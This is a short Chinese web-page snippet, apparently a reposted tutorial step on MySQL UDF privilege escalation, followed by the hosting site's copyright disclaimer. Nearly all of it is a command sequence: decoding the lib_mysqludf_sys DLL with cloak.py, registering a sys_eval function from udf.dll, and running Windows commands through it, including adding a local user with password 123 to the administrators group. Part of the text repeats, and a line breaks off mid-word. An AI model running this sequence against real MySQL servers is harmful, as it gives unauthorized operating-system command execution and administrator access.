2.1.9.4 MySQL udf提权
mysql> select @@plugin_dir;
mysql> create function sys_eval returns string soname 'udf.dll';
Query OK, 0 rows affected (
python3 cloak.py -d -i lib_mysqludf_sys.dll_ mysql> select @@plugin_dir; mysql> create function sys_eval returns string soname 'udf.dll'; Query OK, 0 rows affected (0.02 sec) mysql> select * from mysql.func where name = 'sys_eval'; mysql> select sys_eval('dir'); mysql> select sys_eval('net user'); mysql> select sys_eval('net user user1 123 /add'); mysql> select sys_eval('net localgroup administrators user1 /add'); mysql> select sys_eval('net user'); mysql> select sys_eval('net user user1 /del'); mysql> drop function sys_eval; (编辑:晋中站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |